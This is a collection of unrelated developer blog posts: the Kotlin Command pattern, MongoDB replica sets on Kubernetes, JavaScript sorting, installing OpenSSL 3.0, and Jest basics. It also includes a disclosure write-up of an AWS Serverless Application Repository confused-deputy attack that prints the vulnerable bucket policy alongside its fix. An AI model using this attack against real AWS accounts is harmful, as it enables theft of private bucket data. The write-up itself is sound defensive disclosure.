repeat(10) {
firstInvoker.performAction()
secondInvoker.performAction()
}
}
```
The `CommandProcessor` is an object that processes commands sent to it. Adding new commands does not block their execution, because it runs in a separate scope. In this case, commands that return nothing will work best. You just throw them on the queue, and the command effect (if needed) should come through a different channel, as in a proper `CQRS`. Queue and thread management is on the `Processor` side; the `Invoker` doesn't have to deal with it, or even know whether there are `coroutines`, Java threads or some `RX` underneath. Commands are executed sequentially, one after the other. Combined with the `delay()` in the Receiver action, this results in commands being added to the queue immediately but executed slowly, one by one.
The commands in the queue can also be executed in parallel, with multiple `launchProcessor` coroutines taking the `Channel` as a parameter:
```kotlin
// IRL this would be provided by DI, but for the sake of example `object` will do
object CommandProcessor {
// no changes here
private val commands = Channel<Command>()
private val processScope = CoroutineScope(Executors.newSingleThreadExecutor().asCoroutineDispatcher())
private val executeScope = CoroutineScope(Executors.newSingleThreadExecutor().asCoroutineDispatcher())
private val receiver = Receiver()
fun process(command: Command) {
processScope.launch {
delay(randomDelay())
println("adding $command to the queue")
commands.send(command)
}
}
init {
executeScope.launch {
// starting 5 internal command processors, working on the same queue
// so there can be 5 commands executed at the same time
repeat(5) {
launchProcessor(commands)
}
}
}
// private `extension function` that allows multiple consumers to take commands from the same queue
// each command is executed only once
// after execution is done, the processor takes the next item from the queue
private fun CoroutineScope.launchProcessor(channel: ReceiveChannel<Command>) = launch {
for (command in channel) {
command.execute(receiver)
}
}
}
```
But this also means that if, e.g., `Command 1` takes longer to execute than `Command 2`, the latter will finish sooner, which may not always be a good thing. It depends heavily on the case.
#### Undo
Commands may have a method that allows undoing the changes they have made, i.e. the `undo()` known from graphic or text editors. The implementation will strongly depend on the case, but it can be assumed that the command remembers the state before the change and restores it if necessary. Holding multiple states in history eats memory, and therefore the history buffer is often limited to the last 3 commands (or similar). Undoing a command can also be achieved by executing a command with the opposite parameters; then there is no need to hold the state, and the execution of `undo()` itself can be saved in the history. Undone commands may end up in a separate buffer, allowing them to be executed again with `redo()`.
Strongly simplified example of `undo()` with keeping the before-execution state:
```kotlin
// generic command of drawing "something" on the `Canvas`
abstract class DrawCommand(private val canvas: Canvas) {
// state before executing command - the list of already drawn elements
private var preCommandState = listOf<Shape>()
abstract fun execute()
// saving the state
fun saveState() {
preCommandState = canvas.shapes.toList()
}
// undoing the command, so setting the Canvas state from before execution
fun undo() {
println("undo ${this}")
canvas.shapes = preCommandState.toMutableList()
}
}
// drawable shapes interfaces
interface Shape
data class Line(val length: Int) : Shape
data class Circle(val diameter: Int) : Shape
// commands for drawing shapes, taking params and the Receiver (Canvas)
class DrawLine(private val length: Int, private val canvas: Canvas) : DrawCommand(canvas) {
override fun execute() {
saveState()
canvas.draw(Line(length))
}
}
class DrawCircle(private val diameter: Int, private val canvas: Canvas) : DrawCommand(canvas) {
override fun execute() {
saveState()
canvas.draw(Circle(diameter))
}
}
// Receiver
class Canvas {
// current canvas state
var shapes: MutableList<Shape> = mutableListOf()
// drawing a shape on Canvas means adding it to the list of shapes
fun draw(shape: Shape) {
println("drawing a $shape")
shapes.add(shape)
}
}
fun main() {
val canvas = Canvas()
val commandsHistory = mutableListOf<DrawCommand>()
// after executing the command, it is preserved in history
val drawLine = DrawLine(2, canvas)
drawLine.execute()
commandsHistory.add(drawLine)
val drawCircle = DrawCircle(1, canvas)
drawCircle.execute()
commandsHistory.add(drawCircle)
val drawLongLine = DrawLine(10, canvas)
drawLongLine.execute()
commandsHistory.add(drawLongLine)
val drawBigCircle = DrawCircle(12, canvas)
drawBigCircle.execute()
commandsHistory.add(drawBigCircle)
println("current shapes: ${canvas.shapes}")
println("--- undo last 2 ---")
// reverting last 2 commands
commandsHistory.removeLast().undo()
commandsHistory.removeLast().undo()
println("current shapes: ${canvas.shapes}")
}
```
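The second approach mentioned above, undoing by executing the command with the opposite parameters, can be sketched as follows. This is a minimal illustration in Python rather than Kotlin, and the `Counter` receiver and `AddCommand` are made up for the example, not taken from the article:

```python
class Counter:
    """Hypothetical Receiver: holds a single integer value."""
    def __init__(self):
        self.value = 0

    def add(self, amount):
        self.value += amount


class AddCommand:
    """Command that undoes itself by applying the opposite parameter,
    so no pre-execution state snapshot has to be stored."""
    def __init__(self, amount, counter):
        self.amount = amount
        self.counter = counter

    def execute(self):
        self.counter.add(self.amount)

    def undo(self):
        # "opposite parameters": apply the negated amount
        self.counter.add(-self.amount)


counter = Counter()
history = []
for amount in (2, 5, 10):
    command = AddCommand(amount, counter)
    command.execute()
    history.append(command)
print(counter.value)  # 17

# undo the last command without any stored snapshot
history.pop().undo()
print(counter.value)  # 7
```

The trade-off is that every command must have a well-defined inverse, which is not always the case (a destructive "clear canvas" command, for example, cannot be inverted without a snapshot).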
#### Why not just use lambdas?
It may seem that creating a whole class and then an object just to perform some action is overkill, and that the same functionality and readability can be achieved using lambdas.
Example using a similar processor from the previous case:
```kotlin
fun main() {
// command uses Receiver when its executed
val command = { receiver: Receiver ->
println("this is a command to do stuff")
receiver.action()
}
repeat(10) {
CommandProcessor.process(command)
// lambda-commands don't need to be assigned to variables
CommandProcessor.process { receiver: Receiver ->
println("this is a another command")
receiver.action()
}
}
}
```
We tell the `CommandProcessor`: execute this block using your `Receiver` instance. However, we lose the ability to parameterize command objects. A lambda can take parameters, but they will be used at runtime, inside the `CommandProcessor`. Of course, they can be passed in the `process()` method, but then it is difficult to talk about command encapsulation if you have a block of code in one place and its parameters have to be passed in another.
If the `action()` method were `suspend`, it would need to be handled in the lambda block, wrapping the call in some `CoroutineScope`. It could come from the `CommandProcessor`, just like the `Receiver`, but this is another complication that appears as soon as the lambda is created.
To sum up: if you want to have a parameterized lambda, passed to the processor and used in multiple places of the system - **create a class**.
### Home Automation example
It may be my professional bias, but controlling remote devices is perfect for a real-life example of using the `Command` pattern.
Let's have some devices that can be turned ON or OFF, and a remote control to operate them. The remote control is not directly connected to any specific device; it can control any of them, or multiple at the same time. The remote is also not aware of the device it's controlling; it just handles its button presses.
```kotlin
// Invoker, takes commands in the constructor, but it could also use setters
class RemoteController(
private val firstButtonAction: Command,
private val secondButtonAction: Command,
) {
fun firstButtonClicked() {
firstButtonAction.execute()
}
fun secondButtonClicked() {
secondButtonAction.execute()
}
}
interface Command {
fun execute()
}
// Receiver
class Device(private val name: String) {
// action
fun switch(on: Boolean) {
println("turning device $name ${if (on) "ON" else "OFF"}")
}
}
// concrete command taking the Receiver in the constructor
class TurnOnCommand(private val device: Device) : Command {
override fun execute() {
// and calling a method according to its task
device.switch(true)
}
}
class TurnOffCommand(private val device: Device) : Command {
override fun execute() {
device.switch(false)
}
}
fun main() {
// Receiver instance
val lightBulb = Device("living room light")
// passed to the commands
val turnOn: Command = TurnOnCommand(lightBulb)
val turnOff: Command = TurnOffCommand(lightBulb)
// Invoker (the remote) gets commands for its buttons
val remote = RemoteController(turnOn, turnOff)
// but the Invoker itself is just executing the commands; it has no idea which device it's controlling and how
remote.firstButtonClicked()
remote.secondButtonClicked()
}
```
## Naming
Adding the `Command` suffix to the names of specific commands seems to make sense. It clearly defines what the class is used for. In the case of the `Receiver` or `Invoker`, which by nature already have their own specific tasks and ended up in this pattern only incidentally, such a suffix would only be confusing. You can see that in the last *Home Automation* example.
## Summary
The `Command` is one of my favorite patterns; most of the time I have used it with some form of `CommandProcessor`. It perfectly encapsulates the request and allows it to be moved and reused. It facilitates refactoring, because it is easy to replace one command with another, or to change the internal implementation without affecting its clients.
Command objects can contain a method to undo the changes they made. This is done by keeping the state of the `Receiver` before executing the command, or by executing the command with opposite parameters. Reverted commands can be put on a separate buffer, which allows them to be redone if necessary.
### Pros
- **encapsulation** - the whole logic and the method calls required to perform the task are inside a single object with a generic and simple interface. It allows queueing execution, reusing code, simple testing and refactoring.
- **dynamic behavior change** - passing command objects enables changing the behavior of the `Invoker` at runtime, e.g. when the application config is updated remotely
- **multiple calls in one** - instead of calling multiple methods of a few `Receivers`, a single `Command` can be created that will do all that
- **undo/redo** - this pattern naturally allows undoing and redoing sets of instructions
- **simple extending** - adding new `Command` doesn't influence previous ones, or the calling `Invoker`
### Cons
- **many similar classes** - depending on the situation, using the `Command` pattern can leave you with many classes that differ by a single line
- **premature complication** - using this pattern too early might end up with a single `Command` class used in one place, but surrounded with additional interfaces, a `CommandProcessor`, etc.

*Author: asvid*
---
title: Is your AWS Account vulnerable to the newest attack presented at Black Hat 2021?
published: 2021-09-01
tags: security, aws, cloud
canonical_url: https://codeshield.io/blog/2021/08/26/sar_confused_deputy/
---

#### Running confused deputy attacks exploiting the AWS Serverless Application Repository

Early this month at *Black Hat USA 2021*, researchers from *Wiz.io* [presented](https://www.blackhat.com/us-21/briefings/schedule/index.html#breaking-the-isolation-cross-account-aws-vulnerabilities-22945) a new [confused deputy attack](https://docs.aws.amazon.com/IAM/latest/UserGuide/confused-deputy.html) that allows an attacker to access data within your AWS account. Exploiting too coarsely set IAM permissions when publishing an application within the AWS Serverless Application Repository (SAR), an attacker can acquire arbitrary data from the S3 bucket that is used for hosting the application's artifacts. In this article, we explain the vulnerability, showcase an actual exploit and explain how to fix the vulnerability in your account. If you are publishing an application using SAR, we recommend double-checking your permissions.
SAR is a platform that allows developers to publish and share [SAM](https://aws.amazon.com/serverless/sam/) applications across AWS accounts. These applications can then be deployed standalone or [easily be integrated into existing SAM applications](https://docs.aws.amazon.com/serverless-application-model/latest/developerguide/serverless-sam-template-nested-applications.html).
Publishing an application to SAR is [straightforward](https://docs.aws.amazon.com/serverless-application-model/latest/developerguide/serverless-sam-template-publishing-applications.html#serverless-sam-template-publishing-applications-prerequisites). As an author, one has to pack the underlying application code, templates, license, and readme files into an S3 bucket, create an entry in the SAR, and attach a policy to the bucket that grants SAR access to it.
The S3 policy allows SAR to read all objects stored in the specified S3 bucket. In their documentation, AWS initially proposed to attach the following IAM policy to the bucket:
```.json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "Service": "serverlessrepo.amazonaws.com"
      },
      "Action": "s3:GetObject",
      "Resource": "arn:aws:s3:::<your-bucket-name>/*"
    }
  ]
}
```
What's the problem with this policy? It does not restrict the account on whose behalf SAR is allowed to access the bucket! While no account other than the owner of the SAR application can actually change the application's setup in SAR, any account can exploit SAR to query objects and data from an S3 bucket with such a `BucketPolicy`.
This allows attackers to extract sensitive data like source code, hardcoded credentials, or configuration files that were never meant to be accessible by others. Even worse, if the bucket is used for more than hosting the packed SAR application, which, by the way, is an antipattern itself, attackers can acquire this data too!
*****
### Exploiting the Vulnerability
To showcase the exploit, we prepared a SAR application setup of our [Serverless-Goat-Java](https://github.com/CodeShield-Security/Serverless-Goat-Java/tree/master/sar) implementation. Serverless-Goat was [originally developed](https://github.com/OWASP/Serverless-Goat) in JavaScript by OWASP and is an intentionally vulnerable serverless application. We [published](https://serverlessrepo.aws.amazon.com/applications/eu-central-1/028938425188/Serverless-Goat-Java) Serverless-Goat-Java into the AWS SAR for security training purposes.
With the following template, we deploy an AWS CloudFormation stack with the required bucket and policy to host a SAR app:
```.yaml
AWSTemplateFormatVersion: '2010-09-09'
Transform: AWS::Serverless-2016-10-31
Resources:
  ServerlessGoatPackages:
    Type: AWS::S3::Bucket
    Properties:
      BucketName: "serverless-goat-packages"
  ServerlessGoatPackagesPolicy:
    Type: 'AWS::S3::BucketPolicy'
    Properties:
      Bucket: !Ref ServerlessGoatPackages
      PolicyDocument:
        Version: 2012-10-17
        Statement:
          - Sid: ServerlessRepoAccess
            Action:
              - 's3:GetObject'
            Effect: Allow
            Resource: !Sub "arn:aws:s3:::${ServerlessGoatPackages}/*"
            Principal:
              Service: "serverlessrepo.amazonaws.com"
```
Afterward, we pack our Serverless-Goat-Java application, upload it into the newly created bucket, and create a new application entry in the SAR.

As you can see, the application is bound to the account `028938425188` and can only be modified by it. Let's call the account hosting the vulnerable app `Alice`.
To test our exploit, we need another SAR application in a different account, on whose behalf we can query objects from our ill-configured bucket. Let's call it account `Eve`. For simplicity, we just deployed Serverless-Goat-Java again, but to account `Eve`:

#### Let’s see how we can exploit it!
Now that our setup is complete, we can try to use SAR to query data from account `Alice`'s bucket and set it as a configuration for account `Eve`'s SAR app.
Therefore, we instruct SAR to set the Readme file of account `Eve`'s app to an arbitrary file from account `Alice`:

Looking again at the app in the SAR, SAR displays the following Readme in account `Eve`'s app:

Phew, we are evil! 😈 We just stole the author's license file! Let's try another one:

This time around, the acquired information is much more interesting:

Of course, this is only dummy information for the sake of this demonstration. 😊
As you saw, the exploit is very easy once you know about it. The application's ID is public, only the bucket and file names have to be guessed by an attacker. This might sound hard to do!? Well, as we all know, security by obscurity doesn't work too well, so let's strive for a proper fix!
*****
### Fixing the Vulnerability
The fix is even more straightforward than the exploit! We need to make sure that our bucket used for hosting the SAR app is only accessible by the account that actually publishes the app.
Therefore, we have to modify our `BucketPolicy` to contain a `Condition` that checks which AWS account is instructing SAR to access the bucket:
```.yaml
SampleBucketPolicy:
  Type: 'AWS::S3::BucketPolicy'
  Properties:
    Bucket: !Ref ServerlessGoatPackages
    PolicyDocument:
      Version: 2012-10-17
      Statement:
        - Sid: ServerlessRepoAccess
          Action:
            - 's3:GetObject'
          Effect: Allow
          Resource: !Sub "arn:aws:s3:::${ServerlessGoatPackages}/*"
          Principal:
            Service: "serverlessrepo.amazonaws.com"
          Condition:
            StringEquals:
              "aws:SourceAccount": !Ref "AWS::AccountId"
```
Indeed, AWS added the new condition expression right after the vulnerability was disclosed to them and [updated their documentation accordingly](https://docs.aws.amazon.com/serverless-application-model/latest/developerguide/serverless-sam-template-publishing-applications.html#serverless-sam-template-publishing-applications-prerequisites). However, owners of SAR applications need to update their S3 bucket policies themselves; otherwise the respective AWS accounts remain vulnerable.
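If you host several SAR applications, you can audit your bucket policies yourself. The sketch below is our own illustration, not an AWS API: the function name and the simplified matching are made up, and in practice you would fetch each policy with `aws s3api get-bucket-policy --bucket <name>` before feeding it in. It flags policies that grant `serverlessrepo.amazonaws.com` access without pinning it to your account:

```python
import json

def is_vulnerable_sar_policy(policy_json, account_id):
    """Return True if the policy lets serverlessrepo.amazonaws.com read the
    bucket without an aws:SourceAccount condition pinning it to account_id."""
    policy = json.loads(policy_json)
    statements = policy.get("Statement", [])
    if isinstance(statements, dict):  # a single statement may be a bare object
        statements = [statements]
    for stmt in statements:
        if stmt.get("Effect") != "Allow":
            continue
        principal = stmt.get("Principal", {})
        services = principal.get("Service", []) if isinstance(principal, dict) else []
        if isinstance(services, str):
            services = [services]
        if "serverlessrepo.amazonaws.com" not in services:
            continue
        # the fix: Condition.StringEquals["aws:SourceAccount"] == our account
        allowed = stmt.get("Condition", {}).get("StringEquals", {}).get("aws:SourceAccount")
        if allowed != account_id:
            return True  # SAR may act on behalf of ANY account
    return False

vulnerable = """{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Principal": {"Service": "serverlessrepo.amazonaws.com"},
    "Action": "s3:GetObject",
    "Resource": "arn:aws:s3:::my-sar-bucket/*"
  }]
}"""
print(is_vulnerable_sar_policy(vulnerable, "028938425188"))  # True
```

This only covers the exact policy shape shown in this article; a real audit would also handle condition operator variants.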
After re-deploying our stack with the fixed policy, we observe the following when trying the exploit again:

Awesome! Now SAR can only modify account `Alice`'s app on the behalf of account `Alice`! 🛡
__Note: We changed the policy back after showcasing the fix, so you can try the exploit yourself easily with our [SAR application](https://serverlessrepo.aws.amazon.com/applications/eu-central-1/028938425188/Serverless-Goat-Java)!__
*****
### Fixing the vulnerability is one thing. But how to find it in the first place?
We develop _[CodeShield](https://codeshield.io)_ to help developers and security teams find and fix vulnerabilities in cloud-native applications. _CodeShield_ can also help you find buckets that are vulnerable to the depicted confused deputy attack in your CloudFormation stacks and template files. Check it out and [try CodeShield yourself](https://dashboard.codeshield.io?utm_source=devto&utm_medium=bp&utm_campaign=confuseddep)!

__Stay tuned if you are using Terraform or haven't set up your SAR buckets via a CloudFormation stack.__ We are currently extending CodeShield to be able to scan whole AWS accounts independently of stacks or templates. If you want to get notified when whole account scanning is ready, <a href = "mailto:info@codeshield.io?subject=Whole Account Scanning Request&body=Please let me know when the whole account scanning feature is ready!">drop us a mail</a>!
*****
## About the Authors
**Manuel Benz** is co-founder of [CodeShield](https://codeshield.io?utm_source=devto&utm_medium=bp&utm_campaign=confuseddep), a novel context-aware cloud security tool focusing on in-depth program analysis of microservice architectures. Prior to the start-up, Manuel worked as a researcher on combinations of static and dynamic program analysis for vulnerability detection at the Secure Software Engineering group at Paderborn University. Manuel is still actively maintaining the [Soot static program analysis framework for Java](https://github.com/soot-oss/soot).
**Johannes Späth** is an AWS Community Builder and a co-founder of [CodeShield](https://codeshield.io?utm_source=devto&utm_medium=bp&utm_campaign=confuseddep). Johannes completed his Ph.D. in static program analysis. In his dissertation, he invented a [new algorithm for data-flow analysis](https://github.com/CodeShield-Security/SPDS) which allows automated detection of security vulnerabilities.

*Author: johspaeth*
---
title: Installing MongoDB on Kubernetes with Replica Sets and NO MongoDB Operator
published: 2021-09-10
tags: mongodb, kubernetes, devops, operations
canonical_url: https://dev.to/ksummersill/installing-mongodb-on-kubernetes-with-replica-sets-and-no-mongodb-operator-4bom
---

Are you tired of searching for MongoDB on Kubernetes and immediately landing on a MongoDB site telling you how to use their operator? Are you tired of finding nothing but Helm packages where you have no clue what is really going on, or sets of instructions that are made very complex? Are you tired of having no choice but to be pushed to a MongoDB cloud or a Cloud Service Provider (AWS, Azure, and GCP) service? I was tired of looking online just to find some complex way of setting up MongoDB. So let's cut out the complexity and move on to making MongoDB simple.
*(Image: the full stack deployed on ArgoCD within the cluster.)*

## Step 1. Setting up the Role-Based Access Controls (RBAC)
The first thing we need to do is set up a Service Account, a ClusterRole, and connect the two with a ClusterRoleBinding. These will be used alongside our "headless" service, which MongoDB utilizes when creating the DNS associations for the replica sets.
Create a file called mongodb-rbac.yml and add the following:
```
apiVersion: v1
kind: ServiceAccount
metadata:
  name: mongo-account
  namespace: <your-namespace>
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: mongo-role
rules:
  - apiGroups: [""]
    resources: ["configmaps"]
    verbs: ["*"]
  - apiGroups: ["apps"]
    resources: ["deployments"]
    verbs: ["list", "watch"]
  - apiGroups: [""]
    resources: ["services"]
    verbs: ["*"]
  - apiGroups: [""]
    resources: ["pods"]
    verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: mongo-role-binding
subjects:
  - kind: ServiceAccount
    name: mongo-account
    namespace: <your-namespace>
roleRef:
  kind: ClusterRole
  name: mongo-role
  apiGroup: rbac.authorization.k8s.io
```
The roles are pretty simple. They are set up to have access to watch and list the deployment and review the services of the pods.
Apply the RBAC by running:
```
kubectl apply -f mongodb-rbac.yml
```
## Step 2. Setting up the Headless Service
First of all, What in the world is a "headless" service! Well in Kubernetes by default if no Service Type is specified, then a ClusterIP is given. However, a headless service means that there will be NO ClusterIP given by default. So how do we do this? Well, it's simple. Just add "clusterIP: None" into your specification for the service. Let's do just this.
Create a file called mongodb-headless.yml and add the following:
```
apiVersion: v1
kind: Service
metadata:
  name: mongo
  namespace: <your-namespace>
  labels:
    name: mongo
spec:
  ports:
  - port: 27017
    targetPort: 27017
  clusterIP: None
  selector:
    app: mongo
```
Great! Now apply it by running:
```
kubectl apply -f mongodb-headless.yml
```
## Step 3. Setting up the StatefulSet Deployment with Persistence
MongoDB is really monolithic, but in order to run it on Kubernetes, a StatefulSet deployment will be required. This is because we will NOT be using an Operator to handle statefulness, but will instead do it on our own. Persistence will be set up as well, using a VolumeClaimTemplate.
Create a file called mongodb-stateful-deployment.yml and add the following:
```
apiVersion: apps/v1
kind: StatefulSet
metadata:
  name: mongodb-replica
  namespace: <your-namespace>
spec:
  serviceName: mongo
  replicas: 2
  selector:
    matchLabels:
      app: mongo
  template:
    metadata:
      labels:
        app: mongo
        selector: mongo
    spec:
      terminationGracePeriodSeconds: 30
      serviceAccount: mongo-account
      containers:
      - name: mongodb
        image: docker.io/mongo:4.2
        command: ["/bin/sh"]
        args: ["-c", "mongod --replSet=rs0 --bind_ip_all"]
        resources:
          limits:
            cpu: 1
            memory: 1500Mi
          requests:
            cpu: 1
            memory: 1000Mi
        ports:
        - name: mongo-port
          containerPort: 27017
        volumeMounts:
        - name: mongo-data
          mountPath: /data/db
  volumeClaimTemplates:
  - metadata:
      name: mongo-data
    spec:
      accessModes:
      - ReadWriteOnce
      resources:
        requests:
          storage: 20Gi
```
This should be pretty simple to understand. Basically, the StatefulSet deployment uses the Service Account that was stood up in Step 1, along with the docker.io/mongo:4.2 image. The key to the replica set is the command that runs on startup, given in the args field. This is what sets up the replica set on each pod at runtime:
```
mongod --replSet=rs0 --bind_ip_all
```
Of course, the "/data/db" folder is persisted by assigning it to the VolumeClaimTemplate.
Great! Now apply the file by running:
```
kubectl apply -f mongodb-stateful-deployment.yml
```
## Step 4. Setting up Replication Host
Some manual configuration needs to be done in order to set up replication, but the steps are very simple. First, exec into pod 0, which was created by the StatefulSet, by running:
```
kubectl exec -it mongodb-replica-0 -n <your-namespace> -- mongo
```
This execs into the pod and runs the `mongo` command, dropping us into the MongoDB shell.
From here replication must be initialized. To do so run the following:
```
rs.initiate()
```
The expected output after running rs.initiate() is to see:
"no configuration specified. Using a default configuration for the set".
Now let's set up a variable called cfg, which will hold the result of rs.conf(). Run the following:
```
var cfg = rs.conf()
```
Now let's utilize the variable to add a Primary server to the ReplicaSet configuration.
```
cfg.members[0].host="mongodb-replica-0.mongo:27017"
```
So what in the world does this mean? The "mongodb-replica-0" part is the pod name, "mongo" is the "headless service" that we stood up, and 27017 is, of course, the MongoDB port.
Now let's apply the configuration by running:
```
rs.reconfig(cfg)
```
Great! What we should now see is a response containing:
```
"ok" : 1
```
An ok value of 1 means the configuration was successful.
## Step 5. Add the Second MongoDB Instance/Pod
Now the second instance/pod needs to be added to the replicaset configuration. To do that run the following:
```
rs.add("mongodb-replica-1.mongo:27017")
```
Again the output should show an OK status of 1.
## Step 6. Verify the ReplicaSet Status
This is a very easy command and should be used to reference the primary and secondary servers. Run the command:
```
rs.status()
```
This should now show the two servers added to the replica.
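With both members registered, applications running inside the cluster can reach the replica set through the stable per-pod DNS names provided by the headless service. A connection string would look something like this (a sketch — the database name `mydb` is a placeholder, not from the original steps):
```
mongodb://mongodb-replica-0.mongo:27017,mongodb-replica-1.mongo:27017/mydb?replicaSet=rs0
```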
## Updating Replicas (Optional)
Now let's say that you want to add another replica. All you have to do is run:
```
kubectl scale sts <name of statefulset> -n <name of namespace> --replicas <number of replicas>
```
Now, to add the new replicas to the replica set, just exec back into the replica-0 pod by running:
```
kubectl exec -it mongodb-replica-0 -n <your-namespace> -- mongo
```
Then repeat what we did in Step 5, but for the new pod that was added by the scale-up.
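For example, after scaling to three replicas, the new pod would be added from the mongo shell like this (assuming the naming pattern above):
```
rs.add("mongodb-replica-2.mongo:27017")
```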
Of course, if you want to remove a member, just run rs.remove().
Awesome! I will be creating an article very soon showing how to set up an External Connection within Kubernetes to connect to MongoDB using Compass. | ksummersill |
845,395 | Sorting an Array of JavaScript Objects in a Specific Order | Sorting an array of objects in javascript is simple enough using the default sort() function for all... | 0 | 2021-09-29T22:34:22 | https://dev.to/mick_patterson_/sorting-an-array-of-javascript-objects-in-a-specific-order-48am | javascript, webdev, tutorial | Sorting an array of objects in javascript is simple enough using the default sort() function for all arrays:
```javascript
const arr = [
  {
    name: "Nina"
  },
  {
    name: "Andre"
  },
  {
    name: "Graham"
  }
];

const sortedArr = arr.sort((a, b) => {
  if (a.name < b.name) {
    return -1;
  }
  if (a.name > b.name) {
    return 1;
  }
  return 0;
});
```
And it is trivial enough to swap the sort order by switching the returns or the if statements above.
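For instance, the same comparison can be written more compactly with `String.prototype.localeCompare` (swap the operands, or negate the result, for descending order):

```javascript
const arr = [
  { name: "Nina" },
  { name: "Andre" },
  { name: "Graham" }
];

// b before a gives descending order; use a.name.localeCompare(b.name) for ascending.
const descending = [...arr].sort((a, b) => b.name.localeCompare(a.name));
// → Nina, Graham, Andre
```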
But what if you need to sort an array of objects in a specific, non-alphabetical order?
An example I came across was to transfer some SQL data for importing to a database and the transfer needed to occur in a table-dependent way, so as to not break the table constraints of importing foreign keys that didn't exist yet.
```javascript
// Defined sort order starting with the 'lowest' table in the SQL schema
const importOrder = ["Photo", "Address", "State", "Country"];

const tables = [
  {
    name: "Address"
  },
  {
    name: "State"
  },
  {
    name: "Photo"
  },
  {
    name: "Country"
  }
];

const sortByObject = importOrder.reduce((obj, item, index) => {
  return {
    ...obj,
    [item]: index,
  };
}, {});

const customSort = tables.sort((a, b) => sortByObject[a.name] - sortByObject[b.name]);
```
So what's going on here?
The key is the importOrder.reduce() function. This is transforming the importOrder array into an object that creates a numerical order for each item in the original import array:
```javascript
// Output of sortByObject
{
  Address: 1,
  Country: 3,
  Photo: 0,
  State: 2,
}
```
This then makes sorting the array much simpler by being able to directly look up an integer value for the sort position, which is what we are passing into the sort function of the tables array:
```javascript
// Output of tables.sort()
[
  { name: "Photo" },
  { name: "Address" },
  { name: "State" },
  { name: "Country" }
]
```
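One caveat worth noting (my addition, not from the original post): if a table name is missing from `importOrder`, the lookup yields `undefined` and the subtraction produces `NaN`, which the sort treats unpredictably. A small `?? Infinity` guard pushes unknown names to the end instead:

```javascript
const importOrder = ["Photo", "Address", "State", "Country"];
const sortByObject = importOrder.reduce(
  (obj, item, index) => ({ ...obj, [item]: index }),
  {}
);

// "Legacy" is a made-up table name that is NOT in importOrder.
const tables = [{ name: "Address" }, { name: "Legacy" }, { name: "Photo" }];

// `?? Infinity` sends unknown names to the back instead of producing NaN comparisons.
const customSort = [...tables].sort(
  (a, b) => (sortByObject[a.name] ?? Infinity) - (sortByObject[b.name] ?? Infinity)
);
// → Photo, Address, Legacy
```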
Originally posted [here](https://www.mickpatterson.com.au/blog/sorting-an-array-of-javascript-objects-in-a-specific-order) | mick_patterson_ |
848,302 | Update OpenSSL to 3.0 on CentOS7 | Prerequisites Use sudo when needed. Install perl-IPC-Cmd and perl-Test-Simple: sudo... | 0 | 2021-10-01T20:02:50 | https://dev.to/nikolastojilj12/update-openssl-to-3-0-on-centos7-150o | openssl, centos7, libopenssl, devops | ## Prerequisites
Use `sudo` when needed.
Install `perl-IPC-Cmd` and `perl-Test-Simple`:
```bash
sudo yum install perl-IPC-Cmd perl-Test-Simple
```
## Download and install OpenSSL 3.0
Go to [OpenSSL's download page](https://www.openssl.org/source/) and copy the link to the latest version. At this time it's 3.0.0. Then run (adapt the command to reflect your version):
```bash
cd /usr/src
wget https://www.openssl.org/source/openssl-3.0.0.tar.gz
tar -zxf openssl-3.0.0.tar.gz
rm openssl-3.0.0.tar.gz
```
Compile, make, test and install OpenSSL:
```bash
cd /usr/src/openssl-3.0.0
./config
make
make test
make install
```
Create symlinks to `libssl` and `libcrypto`:
```bash
ln -s /usr/local/lib64/libssl.so.3 /usr/lib64/libssl.so.3
ln -s /usr/local/lib64/libcrypto.so.3 /usr/lib64/libcrypto.so.3
```
Test the installed version with:
```bash
openssl version
```
You should get something like this:
```
OpenSSL 3.0.0 7 sep 2021 (Library: OpenSSL 3.0.0 7 sep 2021)
```
If you liked the article,...
[](https://www.buymeacoffee.com/puEW3HvWvP) | nikolastojilj12 |
882,449 | Know this easily test React app | Jest and Testing Library were the most powerful tool for testing React App. In this post, we are... | 0 | 2021-10-31T02:02:21 | https://www.thangphan.xyz/posts/know-this-easily-test-react-app/ | testing, react, javascript, webdev | ---
canonical_url: "https://www.thangphan.xyz/posts/know-this-easily-test-react-app/"
---
_Jest_ and _Testing Library_ are the most powerful tools for testing React apps. In this post, we are going to discover the important concepts behind them.
Let's dig in!
This is the simplest test we can write when first using _Jest_.
```javascript
test('1 plus 2 equal 3', () => {
  expect(1 + 2).toBe(3)
})
```
### Test Asynchronous
Suppose that I have a fake API that returns a user response with `id: 1`. In the test case, I intentionally set `id: 3` to check whether the test works properly or not, and I still end up with a `passed` message.
The reason is that the test case completes before the promise finishes.
```tsx
test('user is equal user in response', () => {
  const user = {
    userId: 1,
    id: 3,
    title: 'delectus aut autem',
    completed: false,
  }
  fetch('https://jsonplaceholder.typicode.com/todos/1')
    .then((response) => response.json())
    .then((json) => expect(user).toEqual(json))
})
```
In order to avoid this bug, we need to have `return` in front of `fetch`.
```tsx
test('user is equal user in response', () => {
  const user = {
    userId: 1,
    id: 3,
    title: 'delectus aut autem',
    completed: false,
  }
  return fetch('https://jsonplaceholder.typicode.com/todos/1')
    .then((response) => response.json())
    .then((json) => expect(user).toEqual(json))
})
```
The test case above can rewrite using `async, await`:
```tsx
test('user is equal user in response using async, await', async () => {
  const user = {
    userId: 1,
    id: 2,
    title: 'delectus aut autem',
    completed: false,
  }
  const res = await fetch('https://jsonplaceholder.typicode.com/todos/1')
  const resJson = await res.json()
  expect(user).toEqual(resJson)
})
```
### Useful methods
`beforeAll`: To add some code that we want to run once before any test case runs.
`afterAll`: To add some code that we want to run after all test cases are finished. e.g. clear the database.
`beforeEach`: To add some code that we want to run before each test case.
`afterEach`: To add some code that we want to run at the point that each test case finishes.
Suppose that I have three test cases, and I set:
```tsx
beforeEach(() => {
  console.log('beforeEach is working...')
})
```
Three `console.log` outputs will appear in my terminal. Conversely, using `beforeAll` I only see one.
The same logic applies to `afterEach` and `afterAll`.
### The order run
We already have `describe`(combines many test cases), `test`(test case).
What order does Jest run things in if a test file mixes many `describe` and `test` blocks?
You only need to remember this order: `describe` -> `test`.
To illustrate:
```tsx
describe('describe for demo', () => {
  console.log('this is describe')

  test('1 plus 2 equal 3', () => {
    console.log('this is test case in describe')
    expect(1 + 2).toBe(3)
  })

  describe('sub-describe for demo', () => {
    console.log('this is sub-describe')

    test('2 plus 2 equal 4', () => {
